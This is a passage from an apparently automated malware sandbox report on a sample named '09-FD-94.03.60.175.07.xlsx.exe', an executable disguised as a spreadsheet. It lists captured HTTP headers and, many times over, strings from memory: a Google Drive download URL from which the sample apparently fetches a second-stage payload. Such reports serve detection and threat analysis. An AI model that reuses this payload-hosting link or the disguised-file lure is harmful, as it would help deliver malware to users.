ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5ozpAEHkuppLAQ9PArqfo4tPKnWOHgAuXm109UaJIcyanH9G9lPQIOH88n8MyDCsyJContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 16 Dec 2024 16:59:12 GMTCross-Origin-Opener-Policy: same-originContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-ODkTMDIOPuSNloouDxM17Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4qPwmxkdT5dJy6YRHHg3n6lMNkesTwzBPhCD3RAsjeoCdrQcX4Ybh3vK09gLjSrtOTContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 16 Dec 2024 16:59:17 GMTCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: script-src 'nonce-_rMKfn0T2OhGkyRljhcTXg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6GhEO2Ai7sCU3mZfLPhYZMc-mWA1OS5TP9sBmXECW-Eq4KJtAWLFA_ioIH1eOq8vOBContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 16 Dec 2024 16:59:23 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-QhHo2obnTG8bAW07l18oUw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: 09-FD-94.03.60.175.07.xlsx.exe, 00000000.00000000.1483101932.0000000000409000.00000008.00000001.01000000.00000003.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000000.00000002.1592599968.0000000000409000.00000004.00000001.01000000.00000003.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000000.1589553234.0000000000409000.00000008.00000001.01000000.00000003.sdmpString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
      Source: 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2029779940.0000000007377000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
      Source: 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2440247477.0000000007374000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dhttps://drive.usercontent.google.com/download?id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i&export=d
      Source: 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2711387950.0000000007373000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2440265722.0000000007376000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2304015141.0000000007373000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2520873930.0000000007376000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2358896672.0000000007376000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2386530623.0000000007373000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.1859716292.0000000007377000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2440247477.0000000007374000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2029779940.0000000007377000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/
      Source: 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2084014689.0000000007377000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.1971863163.0000000007375000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.1945095137.0000000007377000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2057485924.0000000007377000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.1971819578.0000000007373000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2111662764.0000000007377000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2029779940.0000000007377000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/H4
      Source: 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2195106942.000000000732E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/U
      Source: 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.1971881403.000000000732E000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2001537381.000000000732E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/ertificates
      Source: 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2249921937.000000000732E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/k
      Source: 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000002.2759218527.000000000732E000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.1971881403.000000000732E000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2711412467.000000000732E000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2195106942.000000000732E000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2738254954.000000000732E000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2001537381.000000000732E000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2029830127.000000000732E000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2683002885.000000000732E000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2249921937.000000000732E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/kxV8s5WKEflhLbDqRIq1CtXsroj69i&export=download
      Source: 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2711412467.000000000732E000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2001537381.000000000732E000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2029830127.000000000732E000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2683002885.000000000732E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/kxV8s5WKEflhLbDqRIq1CtXsroj69i&export=download5
      Source: 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000002.2759218527.000000000732E000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2711412467.000000000732E000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2738254954.000000000732E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/kxV8s5WKEflhLbDqRIq1CtXsroj69i&export=download9
      Source: 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000002.2759218527.000000000732E000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2711412467.000000000732E000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2738254954.000000000732E000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2683002885.000000000732E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/kxV8s5WKEflhLbDqRIq1CtXsroj69i&export=downloadU
      Source: 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2195106942.000000000732E000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2249921937.000000000732E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/kxV8s5WKEflhLbDqRIq1CtXsroj69i&export=downloadq
      Source: 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000002.2759218527.000000000732E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/kxV8s5WKEflhLbDqRIq1CtXsroj69i&export=downloadt
      Source: 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000002.2759218527.000000000732E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/kxV8s5WKEflhLbDqRIq1CtXsroj69i&export=downloadtC
      Source: 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2440247477.0000000007374000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/rcontent.google.com/download?id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i&export=do
      Source: 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.1971881403.000000000732E000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2001537381.000000000732E000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2029830127.000000000732E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/t
      Source: 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000002.2759358149.0000000008D60000.00000004.00001000.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000002.2759140100.00000000072F4000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000002.2751009047.000000000019B000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i
      Source: 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000002.2759140100.00000000072F4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69iK
      Source: 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000002.2759140100.00000000072F4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69iY
      Source: 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2466810418.0000000007376000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2466765757.0000000007373000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2331421259.0000000007376000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2628884404.0000000007373000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2413081299.0000000007376000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2574815814.0000000007373000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2494127726.0000000007376000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000002.2759218527.0000000007374000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2602231584.0000000007374000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2358849652.0000000007373000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2413036716.0000000007373000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2494107292.0000000007373000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2738143957.0000000007373000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2520839204.0000000007373000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2548177786.0000000007376000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2711387950.0000000007373000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2440265722.0000000007376000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2520873930.0000000007376000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2358896672.0000000007376000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2386530623.0000000007373000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2440247477.0000000007374000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/y
      Source: 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000002.2759218527.000000000732E000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.1971881403.000000000732E000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2711412467.000000000732E000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2195106942.000000000732E000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2738254954.000000000732E000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2001537381.000000000732E000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2029830127.000000000732E000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2683002885.000000000732E000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2249921937.000000000732E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/
      Source: 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000002.2759218527.000000000732E000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.1971881403.000000000732E000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2711412467.000000000732E000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2195106942.000000000732E000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2738254954.000000000732E000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2001537381.000000000732E000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2029830127.000000000732E000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2683002885.000000000732E000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2249921937.000000000732E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/P
      Source: 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2029779940.0000000007377000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i&export=download
      Source: 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000002.2759140100.00000000072B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i&export=download)
      Source: 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2084014689.0000000007377000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.1971863163.0000000007375000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000002.2759140100.00000000072B8000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.1945095137.0000000007377000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2057485924.0000000007377000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.1971819578.0000000007373000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2111662764.0000000007377000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2139906617.0000000007377000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2029779940.0000000007377000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i&export=download-
      Source: 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.1971863163.0000000007375000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.1945095137.0000000007377000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.1805638779.0000000007377000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.1971819578.0000000007373000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.1887094172.0000000007374000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.1832941399.0000000007377000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.1887112325.0000000007375000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.1859716292.0000000007377000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i&export=download0
      Source: 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2466810418.0000000007376000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2466765757.0000000007373000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i&export=download2
      Source: 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000002.2759218527.000000000732E000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.1971881403.000000000732E000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2195106942.000000000732E000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2738254954.000000000732E000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2249921937.000000000732E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i&export=download5
      Source: 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2195106942.000000000732E000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2683002885.000000000732E000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2249921937.000000000732E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i&export=download9
      Source: 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000002.2759140100.00000000072B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i&export=downloadG
      Source: 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000002.2759218527.000000000732E000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2711412467.000000000732E000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2195106942.000000000732E000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2738254954.000000000732E000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2029830127.000000000732E000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2683002885.000000000732E000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2249921937.000000000732E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i&export=downloadQ
      Source: 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2249921937.000000000732E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i&export=downloadU
      Source: 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2084014689.0000000007377000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2167654319.0000000007377000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2111662764.0000000007377000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2139906617.0000000007377000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i&export=download_
      Source: 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000002.2759218527.000000000732E000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.1971881403.000000000732E000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2711412467.000000000732E000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2195106942.000000000732E000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2738254954.000000000732E000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2001537381.000000000732E000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2029830127.000000000732E000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2683002885.000000000732E000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2249921937.000000000732E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i&export=downloade
